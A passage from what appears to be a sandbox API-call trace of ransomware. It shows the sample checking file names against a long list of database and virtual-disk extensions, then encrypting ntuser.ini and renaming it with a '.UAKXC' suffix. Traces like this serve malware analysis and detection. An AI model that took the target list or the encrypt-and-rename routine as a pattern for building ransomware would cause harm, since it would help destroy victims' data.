returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbt") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbv") returned 0x0 [0147.657] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dbx") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dcb") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dct") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dcx") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ddl") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dlis") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dp1") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dqy") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dsk") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dsn") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dtsx") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".dxl") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".eco") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ecx") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".edb") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".epim") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".exb") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fcd") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fdb") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fic") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fmp") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fmp12") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fmpsl") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fol") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fp3") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fp4") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fp5") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fp7") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fpt") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".frm") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".gdb") returned 0x0 [0147.658] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".grdb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".gwi") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".hdb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".his") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ib") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".idb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ihx") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".itdb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".itw") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".jet") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".jtx") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".kdb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".kexi") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".kexic") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".kexis") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".lgc") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".lwx") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".maf") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".maq") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mar") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mas") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mav") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mdb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mdf") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mpd") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mrg") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mud") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mwb") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".myd") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ndf") returned 0x0 [0147.659] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nnt") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nrmlib") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ns2") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ns3") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".ns4") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nsf") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nv") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nv2") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nwdb") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nyf") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".odb") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".oqy") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".orx") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".owc") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".p96") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".p97") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".pan") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".pdb") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".pdm") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".pnz") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".qry") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".qvd") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rbf") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rctd") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rod") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rodx") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rpd") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".rsd") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sas7bdat") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sbf") returned 0x0 [0147.660] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".scx") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sdb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sdc") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sdf") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sis") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".spq") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sql") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sqlite") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sqlite3") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".sqlitedb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".te") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".temx") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".tmd") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".tps") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".trc") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".trm") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".udb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".udl") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".usr") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".v12") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vis") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vpd") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vvv") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".wdb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".wmdb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".wrk") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".xdb") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".xld") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".xmlff") returned 0x0 [0147.661] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".abcddb") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".abs") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".abx") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".accdw") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".adn") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".db2") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".fm5") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".hjt") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".icg") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".icr") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".kdb") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".lut") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".maw") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mdn") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".mdt") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vdi") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vhd") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmdk") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".pvm") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmem") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmsn") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmsd") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".nvram") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmx") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".raw") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".qcow2") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".subvol") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".bin") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vsv") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".avhd") returned 0x0 [0147.662] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmrs") returned 0x0 [0147.663] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vhdx") returned 0x0 [0147.663] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".avdx") returned 0x0 [0147.663] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".vmcx") returned 0x0 [0147.663] StrStrIW (lpFirst="C:\\Users\\Default\\ntuser.ini", lpSrch=".iso") returned 0x0 [0147.663] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.663] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0147.664] WriteFile (in: hFile=0x6f0, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0147.664] SetEndOfFile (hFile=0x6f0) returned 1 [0147.664] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.664] ReadFile (in: hFile=0x6f0, lpBuffer=0x4100000, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x14, lpOverlapped=0x0) returned 1 [0147.664] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.664] WriteFile (in: hFile=0x6f0, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x14, lpOverlapped=0x0) returned 1 [0147.664] CloseHandle (hObject=0x6f0) returned 1 [0147.665] GetProcessHeap () returned 0xea0000 [0147.665] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xf29490 [0147.666] lstrcpyW (in: lpString1=0xf29490, lpString2="C:\\Users\\Default\\ntuser.ini" | out: lpString1="C:\\Users\\Default\\ntuser.ini") returned="C:\\Users\\Default\\ntuser.ini" [0147.666] lstrcatW (in: lpString1="C:\\Users\\Default\\ntuser.ini", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\ntuser.ini.UAKXC") returned="C:\\Users\\Default\\ntuser.ini.UAKXC" [0147.666] MoveFileW (lpExistingFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="C:\\Users\\Default\\ntuser.ini.UAKXC" (normalized: "c:\\users\\default\\ntuser.ini.uakxc")) returned 1 [0147.666] GetProcessHeap () returned 0xea0000 [0147.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf29490 | out: hHeap=0xea0000) returned 1 [0147.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1770 | out: hHeap=0xea0000) returned 1 [0147.666] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2df8 | out: hHeap=0xea0000) returned 1 [0147.666] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0147.667] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0147.667] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0147.667] GetFileAttributesW (lpFileName="C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini")) returned 0x26 [0147.667] CreateFileW (lpFileName="C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0147.667] GetLastError () returned 0x0 [0147.667] GetFileSizeEx (in: hFile=0x6f0, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=174) returned 1 [0147.667] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".4dd") returned 0x0 [0147.667] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".4dl") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accdb") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accdc") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accde") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accdr") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accdt") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".accft") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".adb") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ade") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".adf") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".adp") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".arc") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ora") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".alf") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ask") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".btr") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".bdf") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".cat") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".cdb") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ckp") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".cma") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".cpd") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dacpac") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dad") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dadiagrams") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".daschema") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".db") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".db-shm") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".db-wal") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".db3") returned 0x0 [0147.668] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbc") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbf") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbs") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbt") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbv") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dbx") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dcb") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dct") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dcx") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ddl") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dlis") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dp1") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dqy") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dsk") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dsn") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dtsx") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".dxl") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".eco") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".ecx") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".edb") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".epim") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".exb") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fcd") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fdb") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fic") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fmp") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fmp12") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fmpsl") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fol") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fp3") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fp4") returned 0x0 [0147.669] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fp5") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fp7") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".fpt") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".frm") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".gdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".grdb") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", lpSrch=".gwi") returned 0x0 [0147.670] StrStrIW (lpFirst="C:\\Users\\Public\\desktop.ini", 